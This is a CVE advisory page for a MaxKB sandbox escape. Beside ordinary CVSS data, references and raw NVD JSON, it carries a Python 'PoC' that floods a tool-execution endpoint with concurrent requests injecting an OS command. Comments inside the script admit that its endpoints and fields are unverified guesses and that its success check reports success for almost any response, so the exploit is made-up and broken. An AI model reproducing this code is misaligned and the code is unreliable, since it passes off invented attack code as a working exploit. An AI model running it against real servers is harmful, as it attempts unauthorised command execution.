Security Vulnerability Report
CVE-2025-66419 CVSS 8.8 HIGH

CVE-2025-66419

Published: 2025-12-11 22:15:56
Last Modified: 2025-12-15 18:05:09

Description

MaxKB is an open-source AI assistant for enterprise. In versions 2.3.1 and below, the tool module allows an attacker to escape the sandbox environment and escalate privileges under certain concurrent conditions. This issue is fixed in version 2.4.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
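CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: this 8.8 vector is the one marked "Secondary" in the raw JSON record below; the "Primary" entry in the same record is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, base score 10.0 (CRITICAL).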

Configurations (Affected Products)

cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:* - VULNERABLE
MaxKB <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66419 MaxKB Sandbox Escape PoC
# Target: MaxKB <= 2.3.1
# Type: Sandbox Escape via Race Condition
#
# NOTE(review): the advisory text on this page says only that the tool module
# can be escaped "under certain concurrent conditions". It does not name the
# endpoints, the tool name or the payload fields used below, so treat those as
# unverified assumptions of this script rather than as facts about MaxKB.
# The page gives 2.4.0 as the fixed version; upgrading is the remediation.
#
# What a defender would see if this ran: one login, then 50 POSTs to the tool
# execution path from the same bearer token, started about 1 ms apart, each
# with a different "context_<n>" id.
import requests
import json
import time
import threading

# Placeholder host and credentials; a valid account is required because every
# tool request below carries the bearer token returned by the login call.
TARGET_URL = "http://target-server:8080"
USERNAME = "[email protected]"
PASSWORD = "password123"

def get_auth_token():
    """Authenticate and get access token.

    POSTs USERNAME/PASSWORD as JSON to ``/api/auth/login`` and returns the
    ``access_token`` field of the JSON response, or None when that field is
    absent. The request has no timeout and a non-JSON response raises.
    """
    login_url = f"{TARGET_URL}/api/auth/login"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = requests.post(login_url, json=data)
    return response.json().get('access_token')

def send_malicious_request(token, payload_id):
    """Send malicious tool request with crafted payload.

    Args:
        token: Bearer token sent in the Authorization header.
        payload_id: Value interpolated into the request's ``context_id``.

    Returns:
        The decoded JSON response, or ``{"error": <message>}`` when the
        request or the JSON decoding raises.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Crafted payload to exploit race condition
    # The submitted code string is identical in every request; only the
    # context_id differs between the concurrent calls.
    malicious_payload = {
        "tool_name": "code_executor",
        "parameters": {
            "code": f"__import__('os').system('whoami')",
            "context_id": f"context_{payload_id}"
        }
    }
    url = f"{TARGET_URL}/api/tools/execute"
    try:
        response = requests.post(url, json=malicious_payload, headers=headers, timeout=5)
        return response.json()
    except Exception as e:
        # Any failure (connection, timeout, non-JSON body) is folded into a
        # dict so the caller's result scan never sees an exception.
        return {"error": str(e)}

def exploit_sandbox_escape():
    """Main exploitation function using race condition.

    Logs in, fires 50 tool requests from separate threads, then scans the
    collected responses. Returns True on the first response the scan accepts
    and False otherwise, including when authentication fails.
    """
    print("[*] Starting CVE-2025-66419 exploitation...")
    # Step 1: Authenticate
    token = get_auth_token()
    if not token:
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")
    # Step 2: Launch concurrent requests to trigger race condition
    threads = []
    results = []
    for i in range(50):
        # i is passed through args, so each thread gets its own idx.
        t = threading.Thread(target=lambda idx: results.append(send_malicious_request(token, idx)), args=(i,))
        threads.append(t)
        t.start()
        time.sleep(0.001)  # Small delay to increase race condition probability
    for t in threads:
        t.join()
    # Step 3: Analyze results for successful exploitation
    for result in results:
        if result and 'data' in result:
            output = result.get('data', {}).get('output', '')
            # NOTE(review): the last clause is true for every response that
            # has a 'data' key and no 'error' key, so a True return here is
            # not evidence that the sandbox was escaped. Do not use this
            # script's verdict to decide whether an instance is vulnerable;
            # compare the installed version with the fixed release instead.
            if 'root' in output or 'www-data' in output or not result.get('error'):
                print("[+] Sandbox escape potentially successful!")
                print(f"[+] Output: {output}")
                return True
    print("[-] Exploitation did not succeed")
    return False

if __name__ == "__main__":
    exploit_sandbox_escape()

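References

- https://github.com/1Panel-dev/MaxKB/commit/f8ada9a110c4dbef8c3c2636c78847ecd621ece7 (Patch)
- https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0 (Release Notes)
- https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f9qm-2pxq-fx6c (Vendor Advisory)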

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66419", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:55.817", "lastModified": "2025-12-15T18:05:09.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. In versions 2.3.1 and below, the tool module allows an attacker to escape the sandbox environment and escalate privileges under certain concurrent conditions. This issue is fixed in version 2.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "E28BF7E2-E3AC-4B21-BE1A-18D1E24691A4"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/f8ada9a110c4dbef8c3c2636c78847ecd621ece7", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f9qm-2pxq-fx6c", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}